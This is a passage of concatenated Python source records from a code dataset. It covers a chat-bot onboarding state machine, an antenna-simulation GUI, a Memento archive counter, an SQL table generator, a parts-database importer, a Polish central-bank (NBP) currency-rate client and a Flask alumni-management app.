if yes, return 1, otherwise 0')\n    if m.channel.id==INTRODUCTIONCHANNELID:\n        return 1\n    return 0\n\n\nnewyak={\n'starthere': {\n    'id':17, \n    'onenter': null_func, \n    'onenter_params': [],\n    'transitions':[\n        {\"on_tick\":{\n            \"run\": has_role,\n            'run_params':[1, 'yak'], \n            'goto': ['justjoined','yak'] \n        }},\n    ]\n    },\n'justjoined': {\n    'id':0, #is this needed?\n    'onenter': send_dm, #NOT run on staying within the same state due to a failed transition\n    'onenter_params': ['welcome to the yak collective.\\n\\nPlease post an introduction within 7 days.\\n\\nStart here (we use roam for data display): (some link to roam)'],#also send 0 as the 2nd parameter\n    'transitions':[\n        {\"on_message\":{#not clear if we really look for other events...\n            \"run\": posted_introduction,\n            'run_params':[], #we always send the yak and the message, followed by the list\n            'goto': ['','yak'] #if 0 stay in state (not the same as going again to justjoined, as we do not zero anything), otherwise go up a level\n        }},\n        {\"on_tick\":{ #called every tick. the first param is checked before we actually run the function (special for on_tick function)\n            #for on_tick we always send the yak and the tick number before the param\n            \"run\": reminder,\n            'run_params':[48,\"please post an introduction in the introduction channel\"],#every 48 ticks post this message. let's assume ticks are in hours\n            'goto':['']\n        }},\n        {\"on_tick\":{ #called every tick\n            \"run\": null_func,\n            'run_params':[7*24],\n            'goto':['out']\n        }}\n    ]\n    },\n'yak': {\n    'id':1,\n    'onenter': send_dm, \n    'onenter_params': ['thank you for posting an introduction. here are some more links to consider\\n'],\n    'transitions': [\n        {\"on_tick\": { #called every tick\n            \"run\": null_func,\n            'run_params':[48],#every 48 ticks post this message. let's assume ticks are in hours\n            'goto':['regular']\n        }\n        }]\n    },\n# we could have more link suggestion states; 'stage1links':\n\n'regular':{ #not much happening here, but we could track what is going on\n    'id':2,\n    'onenter': send_dm, \n    'onenter_params': ['if you ever need help, pls send me a dm \"$help\"'],\n    'transitions':[]\n    },\n'out':{ #not much happening here, but we could track what is going on\n    'id':3,\n    'onenter': kick_out, \n    'onenter_params': ['you did not post an introduction within the required time limit. try again later'],\n    'transitions':[]\n    }\n}\n\nmachines=[\n    {\n    'states':newyak,\n    'name':\"newyak\",\n    'startat':\"starthere\", \n    'lut':{ #will add more when new functions are created\n        \"on_tick\":[],\n        \"on_message\":[]\n    }\n    }\n]    \n","sub_path":"statemachine.py","file_name":"statemachine.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"292637222","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAntenna Visualizer\nCreated on Thu Feb 27 18:05:13 2020\n\nDescription: A GUI-based antenna simulator. 
Tweak sliders to adjust antenna parameters such as length, array patterns, and excitation phasing.\n\nAuthors:\n Jordan Baxter\n Chelsea Starr\n\"\"\"\n\nimport tkinter as tk\nimport matplotlib\nmatplotlib.use('TkAgg')\nfrom matplotlib.backends.backend_tkagg import (\n FigureCanvasTkAgg, NavigationToolbar2Tk)\n# Implement the default Matplotlib key bindings.\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.figure import Figure\nimport plots\n\nclass Application(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n master.title(\"GUI Based Antenna Simulation\")\n self.pack()\n self.create_frames()\n self.create_widgets()\n\n\n def create_frames(self):\n self.p_frame = tk.Frame(self.master)\n self.p_frame.pack(side = 'left')\n self.w_frame = tk.Frame(self.master)\n self.w_frame.pack(side = 'right')\n self.plots = plots.Plots(figsize=(11,9), dpi=75)\n self.canvas = FigureCanvasTkAgg(self.plots, master=self.p_frame)\n self.canvas.draw()\n self.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n\n def create_widgets(self):\n\n ### DROPDOWN OPTIONS MENU ###\n self.simType = tk.StringVar()\n self.simType.set(\"Single Dipole\")\n\n self.simTypeMenu = tk.OptionMenu(self.w_frame,\n self.simType,\n \"Single Dipole\",\n \"Antenna Array\",\n command=self.updateControls)\n self.simTypeMenu.grid(row=0,\n column=1,\n columnspan=2)\n tk.Label(self.w_frame, text=\"Simulation Type\").grid(row=0, column=0)\n ### DROPDOWN OPTIONS MENU ###\n\n ### DELTA PHI SLIDER ###\n self.dp_sc = tk.Scale(self.w_frame,\n from_=-180,\n to=180,\n resolution=5,\n length=300,\n orient='horizontal',\n tickinterval=20,\n command=self.upDPhi,\n label=\"Excitation Phasing [deg]\")\n ### /DELTA PHI SLIDER ###\n\n\n ### D SLIDER ###\n self.d_sc = tk.Scale(self.w_frame,\n from_=0,\n to=2,\n resolution=0.01,\n length=300,\n orient='horizontal',\n tickinterval=0.25,\n command=self.upD,\n label=\"Distance Between Elements [d / \\u03bb]\")\n ### /D SLIDER ###\n\n ### L SLIDER ###\n self.l_sc = tk.Scale(self.w_frame,\n from_=0,\n to=1.75,\n resolution=0.01,\n length=300,\n orient='horizontal',\n tickinterval=0.25,\n command=self.upL,\n label=\"Length of Dipole [l / \\u03bb]\")\n self.l_sc.grid(row=2,\n columnspan=3)\n ### /L SLIDER ###\n\n ### NUMBER OF ELEMENTS SLIDER ###\n self.ne_sc = tk.Scale(self.w_frame,\n from_=2,\n to=20,\n resolution=1,\n length=300,\n orient='horizontal',\n tickinterval=2,\n command=self.upNumEle,\n label=\"Number of Elements\")\n ### /NUMBER OF ELEMENTS SLIDER ###\n\n ### INSERT DIPOLE CHECKBOX ###\n self.insDipVar = tk.IntVar()\n self.insDipVar.set(1)\n\n self.noDip = tk.Radiobutton(self.w_frame,text=\"No Dipole\", variable=self.insDipVar, value=1, command=self.insDip)\n self.coLin = tk.Radiobutton(self.w_frame, text=\"Colinear Array\", variable=self.insDipVar, value=2, command=self.insDip)\n self.perp = tk.Radiobutton(self.w_frame, text=\"Perpendicular Array\", variable=self.insDipVar, value=3, command=self.insDip)\n ### /INSERT DIPOLE CHECKBOX ###\n\n ### Toggle 3D Button ###\n self.button3D = tk.Button(self.w_frame,\n text=\"Show 3D Plot\", fg=\"green\",\n command=self.up3D)\n self.button3D.grid(row=1,\n column=1,\n columnspan=2)\n\n ### QUIT BUTTON ###\n self.quit = tk.Button(self.master, text=\"QUIT\", fg=\"red\",\n command=self.master.destroy)\n self.quit.pack(side=\"bottom\")\n\n def upNumEle(self, slidevalue):\n self.plots.setNumEle(slidevalue)\n self.canvas.draw()\n\n def upDPhi(self, slidevalue):\n 
self.plots.setDPhi(slidevalue)\n self.canvas.draw()\n\n def upD(self, slidevalue):\n if (float(slidevalue) == 0):\n newVal = 0.0001\n else:\n newVal = slidevalue\n self.plots.setD(newVal)\n self.canvas.draw()\n\n def upL(self, slidevalue):\n if (float(slidevalue) == 0):\n newVal = 0.0001\n else:\n newVal = slidevalue\n self.plots.setL(newVal)\n self.canvas.draw()\n\n def up3D(self):\n if (self.plots.toggle3D() == True):\n self.toggleWidgets(\"off\")\n else:\n self.toggleWidgets(\"on\")\n self.canvas.draw()\n\n def insDip(self):\n arrType = self.insDipVar.get()\n if(arrType == 1):\n self.l_sc.grid_forget()\n self.plots.setArrType(\"NoDip\")\n elif(arrType == 2):\n self.l_sc.grid(row=6,\n columnspan=3)\n self.plots.setArrType(\"ColArray\")\n elif(arrType == 3):\n self.l_sc.grid(row=6,\n columnspan=3)\n self.plots.setArrType(\"PerpArray\")\n self.canvas.draw()\n\n def updateControls(self, value):\n simType = self.simType.get()\n if(simType == \"Single Dipole\"):\n self.dp_sc.grid_forget()\n self.d_sc.grid_forget()\n self.ne_sc.grid_forget()\n self.noDip.grid_forget()\n self.coLin.grid_forget()\n self.perp.grid_forget()\n self.insDipVar.set(1)\n self.l_sc.grid(row=2,\n columnspan=3)\n elif(simType == \"Antenna Array\"):\n self.l_sc.grid_forget()\n self.d_sc.grid(row=2,\n columnspan=3)\n self.dp_sc.grid(row=3,\n columnspan=3)\n self.ne_sc.grid(row=4,\n columnspan=3)\n self.noDip.grid(row=5,\n column=0)\n self.coLin.grid(row=5,\n column=1)\n self.perp.grid(row=5,\n column=2)\n self.plots.setSimType(simType)\n self.canvas.draw()\n\n\n def toggleWidgets(self,onOff='on'):\n if(onOff == \"off\"):\n self.dp_sc.configure(state='disabled')\n self.d_sc.configure(state='disabled')\n self.noDip.configure(state='disabled')\n self.coLin.configure(state='disabled')\n self.perp.configure(state='disabled')\n self.l_sc.configure(state='disabled')\n self.simTypeMenu.configure(state='disabled')\n else:\n self.dp_sc.configure(state='normal')\n self.d_sc.configure(state='normal')\n self.noDip.configure(state='normal')\n self.coLin.configure(state='normal')\n self.perp.configure(state='normal')\n self.l_sc.configure(state='normal')\n self.simTypeMenu.configure(state='normal')\n\n\n\n\n### Constuct Figures ###\n\n\nroot = tk.Tk()\napp = Application(master=root)\napp.mainloop()\n","sub_path":"MacOSAntennaSimulator/MacOSAntennaSimulator.app/Contents/Resources/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":8236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"61548971","text":"import re\nimport urllib2\nimport json\nimport sys\n\ndef getmementos(url):\n\tmem_prefix = 'http://mementoproxy.cs.odu.edu/aggr/timemap/link/1/' + url #memento aggregator is concatenated with the url for which mementos should be found out\n\ttry: \n\t\tresponse = urllib2.urlopen(mem_prefix)\n\t\ttime_map = response.read()\n\texcept urllib2.HTTPError:\n\t\ttime_map = None\n\treturn time_map\n\nfind_memento = re.compile(r'rel.*?=.*?\"memento\".*?') # To find memento using regular expression\nmy_urls = open('my_json_data','r+') #This file contains 1000 urls their tweets,tweet ids and created dates\noutput_file = open('mem_and_links.json','a') # This file stores number of mementos for each url\noutput_file2 = open('only_count.csv','a')\noutput_file_carbon = open('mem_grt0.json','a') \none_element={}\ncount_of_mems = [] #array is created to store count \nfor line in my_urls.readlines(): #reads line by line\n\teach_line = json.loads(line) \n\turl = 
each_line['url']\n\tmemento_data = getmementos(url)\n\n\t#print memento_data\n\tif memento_data == 'Null':\n\t\tcount = 0\n\t\tone_element['num_of_mems'] = count\n\t\tone_element['url'] = url\n\t\toutput_file.write(json.dumps(one_element)+'\\n') #adding each element into json file\n\t\t#print count,\" \",url\n\telse:\n\t\tcount = len(find_memento.findall(str(memento_data))) #forms an array where \"memento\"\" is found and finds the length of that array\n\t\t# a=find_memento.findall(str(memento_data))\n\t\t# print a\n\t\tone_element['num_of_mems'] = count\n\t\tone_element['url'] = url\n\t\toutput_file.write(json.dumps(one_element)+'\\n') #adding each element into json file\n\t\toutput_file2.write(\"%s\\n\" % (count))\n\t\tif one_element['num_of_mems'] != 0:\n\t\t\toutput_file_carbon.write(json.dumps(one_element)+'\\n') # for getting urls and mementos for mementos > 0\n\t\t#output_file2.write('\\r\\n')\n\t\t#print count,\" \",url\noutput_file.close()\t\t\noutput_file2.close()\t\noutput_file_carbon.close()\t\n\n\n","sub_path":"Using Python Extracting 1000 unique URI's from twitter and downloading TimeMaps for each target URI using Memento Aggregator/documentation/get_memento_count.py","file_name":"get_memento_count.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"401412491","text":"from thryft.generator.struct_type import StructType\nfrom thryft.generators.sql._sql_compound_type import _SqlCompoundType\nfrom thryft.generators.sql.sql_field import SqlField\nfrom yutil import decamelize, lpad\n\n\nclass SqlStructType(StructType, _SqlCompoundType):\n def sql_create_table(self):\n column_definitions = []\n foreign_key_definitions = []\n for annotation_i, annotation in enumerate(self.annotations):\n if annotation.name == 'sql_column':\n column_definitions.append(annotation.value)\n elif annotation.name == 'sql_foreign_key':\n if annotation_i == 0:\n raise ValueError('sql_foreign_key annotation on a struct must follow a sql_column annotation')\n elif self.annotations[annotation_i - 1].name != 'sql_column':\n raise ValueError(\"sql_foreign_key annotation on a struct must follow a sql_column annotation, not \" + self.annotations[annotation_i - 1].name)\n foreign_key_definitions.append(SqlField.sql_foreign_key_definition_static(\n column_name=self.annotations[annotation_i - 1].value.split(' ', 1)[0],\n foreign_table_name=annotation.value[0],\n foreign_column_name=annotation.value[1]\n ))\n for field in self.fields:\n column_definition = field.sql_column_definition()\n if column_definition is not None:\n column_definitions.append(column_definition)\n for field in self.fields:\n foreign_key_definition = field.sql_foreign_key_definition()\n if foreign_key_definition is not None:\n foreign_key_definitions.append(foreign_key_definition)\n column_definitions.extend(foreign_key_definitions)\n column_definitions = lpad(\",\\n \", \",\\n \".join(column_definitions))\n name = decamelize(self.name)\n return \"\"\"\\\nCREATE TABLE IF NOT EXISTS %(name)s(\n id INTEGER PRIMARY KEY AUTO_INCREMENT NOT NULL%(column_definitions)s\n)\"\"\" % locals()\n\n def sql_name(self):\n return None\n","sub_path":"compiler/src/thryft/generators/sql/sql_struct_type.py","file_name":"sql_struct_type.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"527810881","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2013, First Party Software\n# 
All rights reserved.\n\n# Redistribution and use in source and binary forms, with or without modification, \n# are permitted provided that the following conditions are met:\n\n# 1. Redistributions of source code must retain the above copyright notice, \n# this list of conditions and the following disclaimer.\n\n# 2. Redistributions in binary form must reproduce the above copyright notice, \n# this list of conditions and the following disclaimer in the documentation \n# and/or other materials provided with the distribution.\n\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE \n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE \n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR \n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT \n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) \n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, \n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) \n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF \n# SUCH DAMAGE.\n\nimport re\nimport os\nimport logging\n\nfrom decimal import Decimal, InvalidOperation, ROUND_CEILING\n\nfrom django.db import DatabaseError\nfrom django.core.management.base import BaseCommand\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom servo.models import Product, TaggedItem\n\n\nclass Command(BaseCommand):\n\n help = \"Imports complete GSX parts database\"\n\n def handle(self, *args, **options):\n\n update_prices = True\n import_vintage = True\n dbpath = \"servo/uploads/products/partsdb.csv\"\n\n try:\n partsdb = open(dbpath, \"r\")\n except Exception:\n pass\n\n content_type = ContentType.objects.get(model=\"product\")\n\n for l in partsdb.readlines():\n\n line = l.decode(\"iso-8859-1\")\n row = line.strip().split(\"\\t\")\n\n if row[5] == \"\" or row[5] == \"Currency\":\n continue # Skip header row and rows without currency\n\n logging.debug(row)\n\n category = row[0]\n\n if re.match(r'~VIN', category) and not import_vintage:\n continue # Skip vintage devices if so desired\n\n p_number = row[1]\n\n if re.match(r'675-', p_number):\n continue # Skip DEPOT REPAIR INVOICE\n\n p_title = row[2]\n p_type = row[3]\n lab_tier = row[4]\n\n try:\n stock_price = Decimal(row[6])\n except InvalidOperation:\n continue # Skip parts with no stock price\n\n exchange_price = Decimal(row[7])\n\n eee_code = row[8]\n\n # skip substitute\n component_group = row[10] or None\n is_serialized = row[11]\n req_diag = (row[12] == \"Y\")\n\n product, created = Product.objects.get_or_create(code=p_number)\n\n product.title = p_title\n product.eee_code = eee_code\n product.labour_tier = lab_tier\n product.part_type = p_type or \"OTHER\"\n\n product.component_code = component_group\n product.is_serialized = (is_serialized == \"Y\")\n\n if update_prices:\n if stock_price:\n purchase_sp = Decimal(stock_price)\n product.price_purchase_stock = purchase_sp.to_integral_exact(rounding=ROUND_CEILING)\n product.set_stock_sales_price()\n\n if exchange_price:\n purchase_ep = Decimal(exchange_price)\n product.price_purchase_exchange = purchase_ep.to_integral_exact(rounding=ROUND_CEILING)\n product.set_exchange_sales_price()\n\n product.save()\n\n try:\n tag, created = 
TaggedItem.objects.get_or_create(\n                    content_type=content_type,\n                    object_id=product.pk,\n                    tag=category)\n                tag.save()\n            except DatabaseError:\n                pass\n\n        os.unlink(dbpath)\n","sub_path":"servo/management/commands/importparts.py","file_name":"importparts.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"271075846","text":"from app.db import get_db\nimport requests\nimport time\nimport sys\nfrom datetime import timedelta\n\n# constant declarations\nGET_CURRENCIES_QUERY = 'SELECT name, code FROM currencies;'\nCURRENCY_UPDATE_URL = 'http://api.nbp.pl/api/exchangerates/tables/A?format=json'\nEXCHANGE_API_QUERY = \"http://api.nbp.pl/api/exchangerates/rates/A/{code}/{startDate}/{endDate}/?format=json\"\n\nMAX_DAYS_API = 92\nDEFAULT_TIMEOUT = 1\n\n\ndef get_json_response(url):\n    \"\"\"\n    Returns the JSON structure obtained from the request, while also handling\n    transmission and timeout errors.\n    :param url: request url\n    :return: json\n    \"\"\"\n    try:\n        return requests.get(url, timeout=DEFAULT_TIMEOUT).json()\n    except requests.Timeout:\n        print(' * [dbg] Timeout error while requesting from API', file=sys.stderr)\n        return None\n    except ValueError:\n        print(' * [dbg] Error while parsing JSON response', file=sys.stderr)\n        return None\n    except requests.exceptions.ConnectionError:\n        print(' * [dbg] Connection error', file=sys.stderr)\n        return None\n\n\ndef fetch_currency_list(db, c):\n    \"\"\"\n    Using the NBP API, fetches the list of currencies and saves it in the\n    database for later use.\n    :param db: database handle\n    :param c: cursor handle\n    :return: list of available currencies\n    \"\"\"\n    return_data = []\n    start_time = time.time()\n\n    r = get_json_response(CURRENCY_UPDATE_URL)\n\n    try:\n        currency_list = r[0]['rates']\n        for item in currency_list:\n            c.execute('''INSERT OR IGNORE INTO currencies (name, code)\n            VALUES ('{currency}', '{code}');'''.format(\n                currency=item['currency'],\n                code=item['code'])\n            )\n            return_data.append((item['currency'], item['code']))\n    except KeyError:\n        print(' * [dbg] Error while parsing API request', file=sys.stderr)\n        return None\n\n    # PLN has to be added manually\n    c.execute('''INSERT OR IGNORE INTO currencies (name, code)\n    VALUES ('{currency}', '{code}');'''.format(\n        currency='polski złoty',\n        code='PLN')\n    )\n    return_data.append(('polski złoty', 'PLN'))\n\n    db.commit()\n    end_time = time.time()\n    print(' * [log] Finished getting currency list in {}'.format(end_time - start_time), file=sys.stderr)\n\n    return return_data\n\n\ndef get_currency_list():\n    \"\"\"\n    Returns the available list of currencies from the database. If the number of\n    currencies fetched from the database is less than 2, fetches them from the\n    API, saves them to the database and then returns them.\n    :return: list of currencies\n    \"\"\"\n    db = get_db()\n    c = db.cursor()\n\n    currencies = c.execute(GET_CURRENCIES_QUERY).fetchall()\n\n    if len(currencies) < 2:\n        currencies = fetch_currency_list(db, c)\n\n    return currencies\n\n\ndef get_single_exchange_rate(start_date, end_date,\n                             currency_code):\n    \"\"\"\n    Returns the list of exchange rates of the given currency for the given time period. 
If the database does not contain\n    the full number of required records, a function is run that fetches them from the API.\n    :param start_date: start date\n    :param end_date: end date\n    :param currency_code: currency code\n    :return: list of exchange rates of the given currency\n    \"\"\"\n    days_delta = (end_date - start_date).days\n    db = get_db()\n    c = db.cursor()\n\n    query = '''SELECT date, value from exchange_rates WHERE code = '{code}'\n    AND date BETWEEN '{start_date}' AND '{end_date}' ORDER BY date ASC;'''.format(\n        code=currency_code,\n        start_date=start_date,\n        end_date=(end_date - timedelta(1))\n    )\n\n    rates = c.execute(query).fetchall()\n\n    if len(rates) != days_delta:\n        rates = fetch_single_exchange_rate(db, c, start_date, end_date, currency_code)\n\n    return rates\n\n\ndef fetch_single_exchange_rate(db, c,\n                               start_date, end_date,\n                               currency_code):\n    \"\"\"\n    Fetches the list of exchange rates of the given currency for the specified time\n    period. The NBP API does not have records for every day of the year, so empty\n    records are NULLed to make it easier to determine whether the database holds\n    the required number of rates.\n    :param db: database handle\n    :param c: cursor handle\n    :param start_date: start date\n    :param end_date: end date\n    :param currency_code: currency code\n    :return: list of exchange rates of the given currency\n    \"\"\"\n    return_data = []\n    days_delta = (end_date - start_date).days\n    dates = [(start_date + timedelta(i)).strftime('%Y-%m-%d') for i in range(days_delta)]\n    start_time = time.time()\n\n    query = EXCHANGE_API_QUERY.format(code=currency_code,\n                                      startDate=start_date,\n                                      endDate=end_date)\n\n    try:\n        r = get_json_response(query)\n    except requests.Timeout:\n        print(' * [dbg] Error while requesting from API', file=sys.stderr)\n        return None\n\n    try:\n        rates = r['rates']\n    except KeyError:\n        print(' * [dbg] Error while parsing API request', file=sys.stderr)\n        return None\n    except TypeError:\n        print(' * [dbg] Error while parsing API request', file=sys.stderr)\n        return None\n\n    for rate in rates:\n        if rate['effectiveDate'] in dates:\n            c.execute('''INSERT OR REPLACE INTO exchange_rates (date, value, code)\n            VALUES ('{date}', {value}, '{code}');'''.format(\n                date=rate['effectiveDate'],\n                value=rate['mid'],\n                code=r['code'])\n            )\n            return_data.append((rate['effectiveDate'], rate['mid']))\n            dates.pop(dates.index(rate['effectiveDate']))\n\n    for empty_date in dates:\n        c.execute('''INSERT OR REPLACE INTO exchange_rates (date, empty, code)\n        VALUES ('{date}', {empty}, '{code}');'''.format(\n            date=empty_date,\n            empty=1,\n            code=r['code'])\n        )\n        return_data.append((empty_date, None))\n\n    db.commit()\n    end_time = time.time()\n    print(' * [log] Finished getting query {} -> {} @ {} in {}'.format(\n        start_date,\n        end_date,\n        currency_code,\n        end_time - start_time\n    ), file=sys.stderr)\n\n    return return_data\n\n\ndef get_exchange_rates(start_date,\n                       end_date,\n                       currency_code):\n    \"\"\"\n    Fetches the list of exchange rates of the given currency over a span of time.\n    More precisely, this function splits the requests into parts so as to stay\n    under the NBP API request limit of at most\n    92 days. 
Data is fetched from the database or requested from the API, depending on availability.\n    :param start_date: start date\n    :param end_date: end date\n    :param currency_code: currency code\n    :return: list of exchange rates of the given currency\n    \"\"\"\n    return_data = []\n\n    full_delta = (end_date - start_date).days\n    how_many_runs = full_delta / MAX_DAYS_API\n\n    # if the division comes out as a non-integer float, we perform\n    # at least one extra request\n    if int(how_many_runs) < how_many_runs:\n        how_many_runs = int(how_many_runs) + 1\n\n    # convert to an integer for use in the loop\n    how_many_runs = int(how_many_runs)\n    end = start_date\n\n    for run in range(how_many_runs):\n        start = end\n        end = start + timedelta(days=MAX_DAYS_API)\n        if end > end_date:\n            end = end_date\n\n        print(' * [log] Getting {} from {} -> {}'.format(currency_code, start, end), file=sys.stderr)\n\n        result = get_single_exchange_rate(start, end, currency_code)\n        if result is None:\n            print(' * [dbg] Error while getting data from system', file=sys.stderr)\n            return None\n        else:\n            return_data.extend(result)\n\n    try:\n        return_data.sort(key=lambda tup: tup[0]) # sort before returning\n    except TypeError:\n        print('[dbg] Error while sorting', file=sys.stderr)\n\n    return return_data\n\n\ndef calculate_exchange_rates(base_rates, other_rates):\n    \"\"\"\n    The function calculates exchange rates for currencies other than PLN.\n    Since the NBP API only returns PLN -> X rates, a conversion is required\n    whenever the user requests a different currency pair.\n    :param base_rates: base currency\n    :param other_rates: target currency\n    :return: calculated rate of the target currency\n    \"\"\"\n    result = []\n\n    if len(base_rates) != len(other_rates):\n        print(' * [dbg] Error while converting, data differ in length', file=sys.stderr)\n        return None\n\n    for r1, r2 in zip(base_rates, other_rates):\n\n        try:\n            if r1[1] is None or r2[1] is None:\n                result.append((r1[0], None))\n                continue\n\n            result.append((r1[0], r1[1]/r2[1]))\n        except IndexError:\n            continue\n\n    result.sort(key=lambda tup: tup[0])\n    return result\n","sub_path":"app/api_nbp.py","file_name":"api_nbp.py","file_ext":"py","file_size_in_byte":8901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"98354291","text":"from flask import (Flask, request, flash, url_for, redirect, render_template)\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_mail import Mail, Message\nfrom itsdangerous import URLSafeTimedSerializer, SignatureExpired\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///alumnUS.sqlite'\napp.config['SECRET_KEY'] = \"random string\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config.from_pyfile('config.cfg')\n\nmail = Mail(app)\n\ns = URLSafeTimedSerializer('Thisisasecret!')\n\n\ndb = SQLAlchemy(app)\n\nclass alumni_meets(db.Model):\n    mid = db.Column('mid', db.Integer, primary_key = True)\n    date = db.Column(db.String(100))\n    time = db.Column(db.String(50))\n    no_of_alumni = db.Column(db.String(200)) \n\n\n    def __init__(self, date, time, no_of_alumni, ):\t\n\t    self.date = date\n\t    self.time = time\n\t    self.no_of_alumni = no_of_alumni\n\t    \n\n@app.route('/')\ndef home1():\n    return render_template('home1.html')\n\n@app.route('/meet', methods = ['GET', 'POST'])\ndef meet():\n    if request.method == 'POST':\n        if not request.form['date'] or not request.form['time'] or not request.form['no_of_alumni']:\n            flash('Please enter all the fields', 'error')\n        else:\n            alumni_meet = alumni_meets(request.form['date'], 
request.form['time'],request.form['no_of_alumni'])\n            \n            db.session.add(alumni_meet)\n            db.session.commit()\n            flash('Record was successfully added')\n            return render_template('sendreq.html')\n    return render_template('meet.html')\n    \n    \n@app.route('/sendreq', methods=['GET', 'POST'])\ndef sendreq():\n    if request.method == 'GET':\n        return ''\n    i=0\n    with mail.connect() as conn:\n        email = request.form['email']\n        users = email.split(\",\")\n        while i < len(users):\n            msg = Message('SUBJECT', sender=' authorized email', recipients=[users[i]])\n\n            msg.body = 'CONTENT '\n\n            conn.send(msg)\n            i=i+1\n    return 'The email you entered is {}.
    '.format(email)\n\nclass alumni_personal_details(db.Model):\n aid = db.Column('aid', db.Integer, primary_key = True)\n name = db.Column(db.String(100))\n dob = db.Column(db.String(50))\n address = db.Column(db.String(200)) \n from_y = db.Column(db.String(100))\n to_y = db.Column(db.String(50))\n contact = db.Column(db.String(200)) \n mail_id = db.Column(db.String(100))\n \n\n\n def __init__(self, name, dob, address, from_y, to_y, contact, mail_id):\t\n\t self.name = name\n\t self.dob = dob\n\t self.address = address\n\t self.from_y = from_y\n\t self.to_y = to_y\n\t self.contact = contact\n\t self.mail_id =mail_id\n\n@app.route('/alumni_per', methods = ['GET', 'POST'])\ndef alumni_per():\n if request.method == 'POST':\n if not request.form['name'] or not request.form['dob'] or not request.form['address'] or not request.form['from_y'] or not request.form['to_y'] or not request.form['contact'] or not request.form['mail_id']:\n flash('Please enter all the fields', 'error')\n else:\n alumni_personal = alumni_personal_details(request.form['name'], request.form['dob'],request.form['address'],request.form['from_y'],request.form['to_y'],request.form['contact'],request.form['mail_id'])\n \n db.session.add(alumni_personal)\n db.session.commit()\n flash('Record was successfully added')\n return render_template('home.html')\n return render_template('alumni_per.html')\n\t\n\nclass alumni_professional_details(db.Model):\n aid = db.Column('aid', db.Integer, primary_key = True)\n current_company = db.Column(db.String(100))\n current_position = db.Column(db.String(50))\n qualification = db.Column(db.String(200)) \n \n def __init__(self, current_company, current_position, qualification):\t\n\t self.current_company = current_company\n\t self.current_position = current_position\n\t self.qualification = qualification\n\t \n@app.route('/alumni_prof', methods = ['GET', 'POST'])\ndef alumni_prof():\n if request.method == 'POST':\n if not request.form['current_company'] or not request.form['current_position'] or not request.form['qualification']:\n flash('Please enter all the fields', 'error')\n else:\n alumni_professional = alumni_professional_details(request.form['current_company'], request.form['current_position'],request.form['qualification'])\n \n db.session.add(alumni_professional)\n db.session.commit()\n flash('Record was successfully added')\n return render_template('home1.html')\n\n return render_template('alumni_prof.html')\n \n \nclass feedback(db.Model):\n fid = db.Column('fid', db.Integer, primary_key = True)\n q1 = db.Column(db.String(100))\n q2 = db.Column(db.String(50))\n q3 = db.Column(db.String(200))\n q4 = db.Column(db.String(100))\n q5 = db.Column(db.String(50))\n q6 = db.Column(db.String(200)) \n q7 = db.Column(db.String(100))\n q8 = db.Column(db.String(50))\n q9 = db.Column(db.String(200)) \n q10 = db.Column(db.String(200))\n \n def __init__(self, q1, q2, q3, q4, q5, q6, q7, q8, q9, q10):\n\t self.q1 = q1\n\t self.q2 = q2\n\t self.q3 = q3\n\t self.q4 = q4\n\t self.q5 = q5\n\t self.q6 = q6\n\t self.q7 = q7\n\t self.q8 = q8\n\t self.q9 = q9\n\t self.q10 = q10\n\t \n\n@app.route('/feedback1', methods = ['GET', 'POST'])\ndef feedback1():\n if request.method == 'POST':\n if not request.form['q1'] or not request.form['q2'] or not request.form['q3'] or not request.form['q4'] or not request.form['q5'] or not request.form['q6'] or not request.form['q7'] or not request.form['q8'] or not request.form['q9'] or not request.form['q10']:\n flash('Please enter all the fields', 'error')\n else:\n feedb = 
feedback(request.form['q1'], request.form['q2'], request.form['q3'],request.form['q4'], request.form['q5'], request.form['q6'], request.form['q7'], request.form['q8'], request.form['q9'], request.form['q10'])\n            \n            db.session.add(feedb)\n            db.session.commit()\n            flash('Record was successfully added')\n            return render_template('home1.html')\n    return render_template('feedback1.html')\n\n\n    \nif __name__ == '__main__':\n    db.create_all()\n    app.run(debug = True)\n","sub_path":"alumni/app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
